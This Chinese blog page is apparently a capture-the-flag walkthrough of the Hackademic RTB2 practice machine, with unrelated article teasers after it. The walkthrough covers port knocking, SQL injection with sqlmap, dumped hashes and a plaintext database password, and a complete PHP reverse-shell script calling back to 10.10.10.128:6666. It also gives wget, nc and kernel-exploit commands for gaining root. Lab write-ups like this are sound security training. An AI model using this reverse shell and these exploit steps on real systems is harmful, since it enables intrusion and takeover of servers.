当前位置: 首页 > article >正文

Hackadmin-RTB-2 WP记录

article 2026/3/24 1:37:04
信息搜集永远的第一步不知道666是个什么东西可以访问一下无法访问dirsearch扫下目录依次访问一下看看有没有交互点开始找漏洞扫一下有没有注入点没扫出来并且扫phpmyadmin也没有扫出来虽然目前的两个页面可交互的地方都没有办法通过sql注入进行脱库但是用nmap扫出来的端口也没有别的服务所以还是得从两个可交互页面入手。尝试万能密码登入成功但是仍然没有交互点我们查看下源码发现了奇怪的东西复制问下aiURL 编码数据解码分析一、数据解码这是URL 编码Percent-encoding的数据让我解码第一部分解码text%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61解码后text ---------- \r \n即 ---------- 后跟回车换行第二部分重复的十六进制数据text%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39这些是 ASCII 十六进制值解码后textK n o c k K n o c k K n o c k i n o n h e a v e n s d o o r . . :)我们可以让ai给生成一个解码的脚本#!/usr/bin/env python3 # -*- coding: utf-8 -*- URL编码/十六进制/二进制多层解码脚本 用于解码渗透测试中发现的隐藏信息 import re import binascii import sys def hex_to_ascii(hex_str): 十六进制字符串转ASCII try: # 移除空格和换行 clean_hex re.sub(r[\s\n], , hex_str) hex_bytes bytes.fromhex(clean_hex) return hex_bytes.decode(utf-8, errorsignore) except Exception as e: return f[十六进制解码失败: {e}] def binary_to_ascii(binary_str): 二进制字符串转ASCII try: # 移除空格只保留0和1 clean_binary re.sub(r[^01], , binary_str) result for i in range(0, len(clean_binary), 8): if i 8 len(clean_binary): byte clean_binary[i:i 8] result chr(int(byte, 2)) return result except Exception as e: return f[二进制解码失败: {e}] def url_decode(data): URL解码 try: import urllib.parse return urllib.parse.unquote(data) except: return data def base64_decode(data): Base64解码 try: import base64 return base64.b64decode(data).decode(utf-8, errorsignore) except: return None def decode_hex_sequence(text): 提取并解码文本中的十六进制序列 hex_pattern re.findall(r[0-9A-Fa-f]{2}(?:\s[0-9A-Fa-f]{2})*, text) results [] for hex_seq in hex_pattern: if len(hex_seq.replace( , )) 2: decoded hex_to_ascii(hex_seq) if decoded and not all(c in 0123456789abcdefABCDEF \n\r\t for c in decoded): results.append((hex_seq[:50], decoded[:200])) return results def decode_binary_sequence(text): 提取并解码文本中的二进制序列 binary_pattern re.findall(r[01]{8}(?:\s[01]{8})*, text) results [] for binary_seq in binary_pattern: if len(binary_seq.replace( , )) 8: decoded binary_to_ascii(binary_seq) if decoded and not all(c in 01 \n\r\t for c in decoded): results.append((binary_seq[:50], decoded[:200])) return results def main(): 主函数 # 你的原始数据 original_data %33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%20%30%64%20%30%61%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%32%30%20%34%62%20%36%65%20%36%66%20%36%33%20%36%62%20%36%39%20%36%65%20%32%37%20%32%30%20%36%66%20%36%65%20%32%30%20%36%38%20%36%35%20%36%31%20%37%36%20%36%35%20%36%65%20%32%37%20%37%33%20%32%30%20%36%34%20%36%66%20%36%66%20%37%32%20%32%30%20%32%65%20%32%65%20%32%30%20%33%61%20%32%39%20%30%64%20%30%61%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%31%20%33%30%20%33%31%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%30%20%32%30%20%33%30%20%33%30%20%33%31%20%33%31%20%33%30%20%33%30%20%33%30%20%33%31%20%30%64%20%30%61%20%33%63%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%32%64%20%33%65%0A print( * 70) print( 多层编码解码工具) print( * 70) # 第1层URL解码 print(\n[第1层] URL解码...) layer1 url_decode(original_data) print(f结果: {layer1[:200]}...) print() # 第2层十六进制转ASCII print([第2层] 十六进制转ASCII...) layer2 hex_to_ascii(layer1) print(f结果:\n{layer2}) print() # 第3层提取二进制数据 print([第3层] 提取二进制数据...) binary_pattern re.findall(r[01]{8}(?:\s[01]{8})*, layer2) if binary_pattern: print(f找到 {len(binary_pattern)} 组二进制数据) all_binary .join(binary_pattern) print(f二进制数据: {all_binary[:100]}...) # 转换为ASCII layer3 binary_to_ascii(all_binary) print(f\n二进制解码结果: {layer3}) # 第4层如果是十六进制继续解码 if layer3 and all(c in 0123456789abcdefABCDEF \n\r\t for c in layer3[:100]): print(\n[第4层] 检测到十六进制继续解码...) layer4 hex_to_ascii(layer3) print(f结果: {layer4}) # 第5层可能又是二进制 binary_in_hex re.findall(r[01]{8}, layer4) if binary_in_hex: print(\n[第5层] 检测到二进制继续解码...) layer5 binary_to_ascii( .join(binary_in_hex)) print(f结果: {layer5}) # 第6层可能是Base64 if layer5 and len(layer5) 10: b64_result base64_decode(layer5) if b64_result: print(\n[第6层] Base64解码:) print(f结果: {b64_result}) # 额外提取所有十六进制序列 print(\n * 70) print(额外提取的十六进制序列:) print( * 70) hex_results decode_hex_sequence(layer2) for hex_seq, decoded in hex_results: print(f\n十六进制: {hex_seq}...) print(f解码: {decoded}) print(\n * 70) print(解码完成) print( * 70) if __name__ __main__: main()解码之后得到了这么一组数据结合之前的knockknock可以推断一下这里用的是端口敲门端口敲门Port Knocking详解端口敲门是一种网络安全技术通过向服务器的一系列特定端口发送预定义的连接尝试序列来“敲门”触发防火墙规则动态开放访问权限。可以理解为一种秘密敲门暗号——只有知道正确“敲门顺序”的人才能打开服务端口。 工作原理核心概念敲门序列预定义的端口连接顺序如 1000→2000→3000防火墙规则初始状态关闭所有服务端口如 SSH触发机制防火墙监控连接日志检测到正确序列后动态开放端口工作流程text1. 客户端按顺序连接指定端口1000 → 2000 → 3000 2. 服务器防火墙检测到序列匹配 3. 防火墙添加临时规则开放 SSH 端口如 22 4. 客户端在短时间内建立 SSH 连接 5. 连接结束后端口自动关闭 端口敲门 vs 单包授权特性端口敲门 (Port Knocking)单包授权 (SPA)原理多个端口连接序列单个加密数据包安全性序列可被嗅探加密防重放隐蔽性端口连接可被看到UDP 包不可见实现复杂度简单较复杂典型工具knockdfwknop 实际配置示例1.使用 knockd 实现端口敲门服务端配置/etc/knockd.confini[options] logfile /var/log/knockd.log [openSSH] sequence 7000,8000,9000 # 敲门序列 seq_timeout 5 # 5秒内完成序列 command /sbin/iptables -A INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags syn [closeSSH] sequence 9000,8000,7000 # 关闭序列反向 seq_timeout 5 command /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT tcpflags syn客户端敲门bash# 发送敲门序列 knock -v target-server.com 7000 8000 9000 # 然后正常 SSH 连接 ssh usertarget-server.com2.使用 iptables 脚本实现自定义敲门脚本bash#!/bin/bash # 发送敲门信号 for port in 1000 2000 3000; do nc -z -w 1 $1 $port sleep 0.5 done 安全优势优势说明减少攻击面服务端口默认关闭端口扫描无法发现防止暴力破解攻击者不知道敲门序列无法访问服务动态访问控制按需开放使用后自动关闭防御 0day 漏洞即使服务有漏洞未授权也无法访问隐蔽性无开放端口降低被发现的概率⚠️ 局限性问题说明序列可嗅探敲门序列在网络中明文传输可被抓包截获重放攻击攻击者可重放捕获的序列绕过防护DoS 风险序列冲突或误触发可能导致服务不可用性能开销每次连接前需要额外敲门步骤单点依赖防火墙规则生效依赖服务正常运行那么接下来我们要尝试使用端口敲门去打开666端口再次用nmap扫描可以看见此时的666端口已经打开再次访问666端口怀疑这里有sql注入点好吧并没有我们只能找找有没有其他的交互点点击list可以看见url有非常明显的变化怀疑有sql注入好的这回是真有脱数据脱库当前数据库是joomla脱joomla中的表脱数据joomla-jos_usersIDGID用户名邮箱用户类型注册时间最后登录6225Administratoradminhackademirtb2.comSuper Administrator2011-01-17 19:31:212011-01-22 16:38:496318JSmithJSmithhackademicrtb.comRegistered2011-01-22 10:17:302011-01-25 15:02:136418BTallorBTallorhackademic.comRegistered2011-01-22 10:18:060000-00-00 00:00:00JSmith -matrixBTallor -victim脱mysql中的表爆数据mysql-userHostUser密码哈希权限用途localhostroot*5D3C124406BF85494067182754131FF4DAB9C6C7全部权限(Y)MySQL root 账户HackademicRTB2root*5D3C124406BF85494067182754131FF4DAB9C6C7全部权限(Y)主机名绑定的 root127.0.0.1root*5D3C124406BF85494067182754131FF4DAB9C6C7全部权限(Y)本地 rootlocalhostdebian-sys-maint*F36E6519B0B1D62AA2D5346EFAD66D1CAF248996全部权限(Y)Debian 系统维护用户localhostphpmyadmin*5D3C124406BF85494067182754131FF4DAB9C6C7无权限(N)phpMyAdmin 专用用户但是很遗憾这些密码没办法解开getshell用sqlmap拿到shell​ sqlmap -u http://10.10.10.134:666/index.php?optioncom_abcviewabcletterListofcontentitems...Itemid3 --batch --os-shell ​查看文件得到密码用户: root密码: yUtJklM97W数据库: joomla主机: localhost但是os-shell很不稳定好难用的一个功能所以我们尝试更换为反弹shell反弹shell?php set_time_limit (0); $VERSION 1.0; $ip 10.10.10.128; // CHANGE THIS $port 6666; // CHANGE THIS $chunk_size 1400; $write_a null; $error_a null; $shell uname -a; w; id; /bin/sh -i; $daemon 0; $debug 0; if (function_exists(pcntl_fork)) { $pid pcntl_fork(); if ($pid -1) { printit(ERROR: Cant fork); exit(1); } if ($pid) { exit(0); // Parent exits } if (posix_setsid() -1) { printit(Error: Cant setsid()); exit(1); } $daemon 1; } else { printit(WARNING: Failed to daemonise. This is quite common and not fatal.); } chdir(/); umask(0); $sock fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { printit($errstr ($errno)); exit(1); } $descriptorspec array( 0 array(pipe, r), 1 array(pipe, w), 2 array(pipe, w) ); $process proc_open($shell, $descriptorspec, $pipes); if (!is_resource($process)) { printit(ERROR: Cant spawn shell); exit(1); } stream_set_blocking($pipes[0], 0); stream_set_blocking($pipes[1], 0); stream_set_blocking($pipes[2], 0); stream_set_blocking($sock, 0); printit(Successfully opened reverse shell to $ip:$port); while (1) { if (feof($sock)) { printit(ERROR: Shell connection terminated); break; } if (feof($pipes[1])) { printit(ERROR: Shell process terminated); break; } $read_a array($sock, $pipes[1], $pipes[2]); $num_changed_sockets stream_select($read_a, $write_a, $error_a, null); if (in_array($sock, $read_a)) { if ($debug) printit(SOCK READ); $input fread($sock, $chunk_size); if ($debug) printit(SOCK: $input); fwrite($pipes[0], $input); } if (in_array($pipes[1], $read_a)) { if ($debug) printit(STDOUT READ); $input fread($pipes[1], $chunk_size); if ($debug) printit(STDOUT: $input); fwrite($sock, $input); } if (in_array($pipes[2], $read_a)) { if ($debug) printit(STDERR READ); $input fread($pipes[2], $chunk_size); if ($debug) printit(STDERR: $input); fwrite($sock, $input); } } fclose($sock); fclose($pipes[0]); fclose($pipes[1]); fclose($pipes[2]); proc_close($process); function printit ($string) { if (!$daemon) { print $string\n; } } ?首先再开一个命令页称呼它为kali当前有os-shell的称呼为靶机先在kali上开启http服务python3 -m http.server 8000再在靶机上去下载shell.php因为os-shell不稳定所以命令没有成功大家要多试试查看靶机上有没有shell.phpcat shell.php上传成功后在kali上开始监听nc -lvnp 6666再去访问shell.php给shell升级一下python -c import pty; pty.spawn(/bin/bash)内核提权先查看一下当前靶机内核版本这里可以用脏牛但是这次我打算用历史漏洞来突破bash./linux-exploit-suggester-2.pl -k 2.6.32 | grep 15285这个命令的作用linux-exploit-suggester-2.pl是一个自动检测提权漏洞的工具-k 2.6.32指定内核版本| grep 15285过滤出 exploit 15285Source: http://www.exploit-db.com/exploits/1528515285.c是CVE-2010-3904的 exploit漏洞名称Linux Kernel 2.6.x (RDS协议) 本地提权影响版本内核 2.6.30 - 2.6.36你的内核 2.6.32 正好在受影响范围内在这里打开http服务切换至之前由反弹shell监听的界面首先切换至可写目录cd /tmp再去下载15285.c这个文件​ wget http://10.10.10.128:8000/15285.c查看文件是否下载成功ls -la 15285.c编译这个文件gcc 15285.c -o exploit运行这个文件./exploit此时可以看见提权成功漏洞补充用之前得到的root-yUtJklM97W可以成功登入用JSmith -matrix可以成功登入新人小白如果写的不好还请见谅

相关文章:

Hackadmin-RTB-2 WP记录

信息搜集永远的第一步不知道666是个什么东西,可以访问一下无法访问dirsearch扫下目录依次访问一下看看有没有交互点开始找漏洞扫一下有没有注入点没扫出来并且扫phpmyadmin也没有扫出来虽然目前的两个页面可交互的地方都没有办法通过sql注入进行脱库,但是…...

编程日记 2026/3/24 1:37:04

挖到宝了!沃尔沃项目EPLAN工程模板全集,10套超值大放送

超值大型10套 EPLAN 工程:沃尔沃项目模板全集,高效设计一触即达 超大型I EPLAN电气工程图纸I 沃尔沃项目EPLAN图纸模板合集 另外:再10套PDF图纸(已打包一起) 1. 参考车企设备通用标准图纸层级分类(高层代号分类)&#…...

编程日记 2026/3/24 1:35:04

一键部署QWEN-AUDIO:赛博可视化界面,让文字秒变超自然语音

一键部署QWEN-AUDIO:赛博可视化界面,让文字秒变超自然语音 1. 引言:语音合成的未来已来 想象一下,你正在为一个重要项目准备演示文稿,需要为每张幻灯片配上专业解说。传统方法要么自己录音,要么花钱请配音…...

编程日记 2026/3/24 1:35:04

COCO2017数据集实战:如何利用官方API统计各类别的图片和标注框数量

COCO2017数据集深度解析:用Python API实现类别统计与可视化分析 计算机视觉领域的研究者和开发者们,一定对COCO数据集不陌生。作为目前最流行的目标检测基准数据集之一,COCO2017以其丰富的标注类别和高质量的图像数据,成为算法开发…...

编程日记 2026/3/24 1:35:04

告别出图焦虑!用Cadence Allegro导出Gerber文件的5个关键检查点与高效技巧

告别出图焦虑!Cadence Allegro导出Gerber文件的5个关键检查点与高效技巧 作为一名PCB工程师,你是否曾在深夜赶项目时,因为Gerber文件导出错误而被迫返工?或是面对复杂的多层板设计,对导出流程的每一步都如履薄冰&#…...

编程日记 2026/3/24 1:35:04

Prompt Engineering入门指南:从入门到精通的实战笔记

👋 大家好,欢迎来到我的技术博客! 📚 在这里,我会分享学习笔记、实战经验与技术思考,力求用简单的方式讲清楚复杂的问题。 🎯 本文将围绕人工智能这个话题展开,希望能为你带来一些启…...

编程日记 2026/3/24 1:35:04

【首发实测】RTX 4060 成功捕获 Karpathy 的“自动科研助手”!5分钟跑完 3500 万 Token,进化开始!

【首发实测】RTX 4060 成功捕获 Karpathy 的“自动科研助手”!5分钟跑完 3500 万 Token,进化开始! Baseline 跑通,坐标 4060 笔记本 经过一波三折的环境折腾(解决 Windows 不支持 Triton、修改镜像源、手动魔改 train.py),我终于在我的 RTX 4060 Laptop 上成功跑通了 …...

编程日记 2026/3/24 1:33:04

Wireshark实战:如何从流量包中揪出黑客的蛛丝马迹(附真实案例解析)

Wireshark实战:从流量包中还原黑客攻击全链条 网络安全的世界里,数据包就像犯罪现场的指纹。作为网络取证领域的瑞士军刀,Wireshark能让我们像侦探一样,从海量流量中抽丝剥茧还原攻击过程。今天我们就通过一个真实案例&#xff0c…...

编程日记 2026/3/24 1:33:04

从PyInstaller到NSIS:一个全栈项目打包避坑指南当Vue遇上FastAPI,如何优雅地打包成Windows安装程序

从PyInstaller到NSIS:一个全栈项目打包避坑指南当Vue遇上FastAPI,如何优雅地打包成Windows安装程序前言最近完成了一个印章提取工具的开发,前端使用Vue 3,后端是Python FastAPI。项目开发阶段一切顺利,但到了打包交付环…...

编程日记 2026/3/24 1:33:04

效率系列(九) macOS 前端开发环境优化与个性化配置指南

1. 为什么需要优化macOS前端开发环境? 作为一个长期在macOS上折腾前端开发的"老司机",我深刻体会到开发环境配置对工作效率的影响。你可能遇到过这些场景:终端反应迟钝、代码补全不智能、项目切换时环境冲突...这些问题看似不大&am…...

编程日记 2026/3/24 1:33:04

Python 集成视频录制(Selenium):让 UI 自动化问题无处隐藏

📝 面试求职: 「面试试题小程序」 ,内容涵盖 测试基础、Linux操作系统、MySQL数据库、Web功能测试、接口测试、APPium移动端测试、Python知识、Selenium自动化测试相关、性能测试、性能测试、计算机网络知识、Jmeter、HR面试,命中…...

编程日记 2026/3/24 1:33:04

推荐系统工程师必看:如何高效追踪RecSys/KDD/SIGIR顶会论文中的工业落地技术?

推荐系统工程师必看:如何高效追踪RecSys/KDD/SIGIR顶会论文中的工业落地技术? 在算法驱动的互联网时代,推荐系统工程师的竞争力不仅在于代码能力,更在于对技术前沿的敏锐嗅觉。每年RecSys、KDD、SIGIR三大顶会产出的上千篇论文中&…...

编程日记 2026/3/24 1:31:03

PyTorch版本选不对,GPU再强也白费!手把手教你根据CUDA 12.x选对Torch版本

PyTorch版本选不对,GPU再强也白费!手把手教你根据CUDA 12.x选对Torch版本 每次打开PyTorch官网,看到密密麻麻的版本号是不是瞬间头大?CUDA 12.7驱动下到底该选12.1还是12.6的PyTorch?torchvision版本又该怎么配&#x…...

编程日记 2026/3/24 1:31:03

用Substance Painter制作写实金属锈蚀效果:从智能材质到粒子笔刷的完整流程

用Substance Painter制作写实金属锈蚀效果:从智能材质到粒子笔刷的完整流程 在次世代游戏和影视资产制作中,金属锈蚀效果的真实度往往决定了场景的沉浸感。许多3D美术师都曾遇到过这样的困境:明明使用了高精度模型和4K贴图,但金属…...

编程日记 2026/3/24 1:31:03

亚洲美女-造相Z-Turbo可部署方案:单卡3090/4090即可运行的轻量文生图服务

亚洲美女-造相Z-Turbo可部署方案:单卡3090/4090即可运行的轻量文生图服务 1. 快速了解造相Z-Turbo 造相Z-Turbo是一个专门针对亚洲女性形象生成的文生图模型,基于Z-Image-Turbo的LoRA版本进行优化。这个模型最大的特点是轻量高效,单张RTX 3…...

编程日记 2026/3/24 1:31:03

告别手动复制粘贴:影刀RPA内置包 + Xpath + MySQL 打造你的第一个数据自动化流水线

影刀RPAXpathMySQL:零代码构建企业级数据自动化流水线 每天早晨9点,市场部的张经理都要重复同样的工作:打开5个行业数据网站,手动复制表格数据到Excel,清洗格式后导入MySQL数据库。这种机械操作不仅消耗2小时有效工作时…...

编程日记 2026/3/24 1:31:03

PyTorch实战:手把手教你为图像修复任务定制Feature Loss(附VGG16/19、ResNet对比)

PyTorch实战:图像修复任务中的定制化特征损失函数设计指南 修复一张褪色的老照片时,我们常遇到这样的困境:过度强调像素级匹配会导致修复区域出现不自然的色块,而单纯依赖高层语义又可能丢失原图的纹理细节。这正是传统L1/L2损失函…...

编程日记 2026/3/24 1:29:03

2026最权威AI论文平台榜单:这几款被高校和导师悄悄推荐

AI论文平台正在重塑学术研究与写作的效率与质量。随着人工智能技术的不断突破,越来越多高校与科研机构开始关注并引入合规、高效、智能的AI论文工具。依托权威检测平台数据、多所高校师生实测反馈以及用户真实使用体验,本文将深度盘点2026年最受推崇的AI…...

编程日记 2026/3/24 1:29:03

图像压缩入门:从哈夫曼编码到算术编码,哪种更适合你的项目?

图像压缩算法实战指南:哈夫曼编码与算术编码的深度对比 在数字图像处理领域,数据压缩技术扮演着至关重要的角色。无论是社交媒体上的照片分享,还是医疗影像的远程传输,高效的压缩算法都能显著减少存储空间和带宽需求。本文将聚焦两…...

编程日记 2026/3/24 1:29:03

告别复杂配置!丹青幻境Z-Image Atelier在边缘设备一键部署实战

告别复杂配置!丹青幻境Z-Image Atelier在边缘设备一键部署实战 1. 项目概述:当东方美学遇见边缘计算 丹青幻境Z-Image Atelier是一款独具匠心的AI艺术创作工具,它将先进的图像生成技术与东方美学完美融合。不同于传统AI工具冰冷的科技感&am…...

编程日记 2026/3/24 1:29:03

深入解析ARM Cortex-M的软复位机制:从NVIC_SystemReset到系统重启

1. ARM Cortex-M软复位机制的核心价值 第一次在STM32项目里遇到系统死机时,我盯着黑屏的调试终端手足无措。直到发现NVIC_SystemReset这个"救命按钮",才明白软复位对嵌入式系统就像汽车的安全气囊——平时看不见,关键时刻能救命。不…...

编程日记 2026/3/24 1:29:03

销售客户推荐难?RPA自动找相似客户,拓展更易成功

RPA技术在客户推荐中的应用RPA(Robotic Process Automation)技术能自动化执行重复性任务,包括客户数据分析和推荐。通过分析现有客户数据,RPA可以识别相似客户特征,帮助销售团队精准定位潜在客户。数据收集与清洗RPA工…...

编程日记 2026/3/24 1:27:03

XShell突然罢工?别慌!手把手教你用FinalShell无缝衔接你的服务器管理工作流

XShell突然罢工?别慌!手把手教你用FinalShell无缝衔接你的服务器管理工作流 作为一名长期与服务器打交道的工程师,最怕的莫过于主力工具突然罢工。上周三凌晨两点,我在处理线上故障时,XShell毫无征兆地崩溃&#xff0…...

编程日记 2026/3/24 1:27:03

黑丝空姐-造相Z-Turbo在网络安全领域的模拟应用:生成测试用例图像

黑丝空姐-造相Z-Turbo在网络安全领域的模拟应用:生成测试用例图像 最近和几个做安全测试的朋友聊天,他们都在抱怨同一个问题:做系统健壮性测试,尤其是人脸识别或者界面安全测试的时候,找合适的测试数据太麻烦了。要么…...

编程日记 2026/3/24 1:27:03

STM32实战-高级定时器互补PWM与硬件刹车机制深度解析

1. 硬件电路设计要点 在电机控制系统中,硬件电路的设计直接影响着PWM信号的稳定性和刹车响应速度。我遇到过不少新手工程师直接用三极管搭H桥电路,结果电机一启动就烧管子的情况。这里分享几个关键设计经验: 首先,MOSFET的选择比三…...

编程日记 2026/3/24 1:27:03

11倍性能突破:Lightpanda如何重新定义无头浏览器的技术边界

11倍性能突破:Lightpanda如何重新定义无头浏览器的技术边界 【免费下载链接】browser The open-source browser made for headless usage 项目地址: https://gitcode.com/GitHub_Trending/browser32/browser 决策指南:是否需要Lightpanda&#xf…...

编程日记 2026/3/24 1:27:03

Leaflet矢量瓦片实战:PBF切片加载与交互优化

1. Leaflet与PBF矢量切片基础入门 第一次接触Leaflet加载PBF矢量切片时,我被这种轻量级方案惊艳到了。相比传统栅格瓦片,矢量切片就像给地图装上了"乐高积木"——数据量减少70%的同时,还能在客户端自由调整样式。PBF(Pr…...

编程日记 2026/3/24 1:25:02

从零到一:小兔鲜电商项目全栈开发实战与架构演进

1. 项目背景与技术选型 小兔鲜电商项目是一个典型的B2C电商平台,采用前后端分离架构。这个项目特别适合想要从零开始学习全栈开发的工程师,因为它涵盖了从需求分析到部署上线的完整生命周期。 在技术选型上,我们选择了目前企业级开发中最流行…...

编程日记 2026/3/24 1:25:02

Node.js后端服务调用Nanbeige 4.1-3B AI能力:完整集成示例

Node.js后端服务调用Nanbeige 4.1-3B AI能力:完整集成示例 1. 引言 想象一下,你正在开发一个内容管理平台,每天有大量文章需要处理。编辑团队希望快速生成文章摘要,或者把生硬的草稿润色成流畅的邮件。手动处理这些任务不仅耗时…...

编程日记 2026/3/24 1:25:02

保姆级教程:PX4飞控启动脚本rcS完全解读与自定义配置(附避坑指南)

PX4飞控启动脚本rcS深度解析与高级定制指南 1. 理解PX4启动流程的核心架构 PX4飞控系统的启动过程就像一场精心编排的交响乐,每个模块按照特定顺序登场。作为开发者,掌握这套机制意味着你能精准控制飞控的初始化行为。让我们先拆解这个复杂流程的骨架。 …...

编程日记 2026/3/24 1:25:02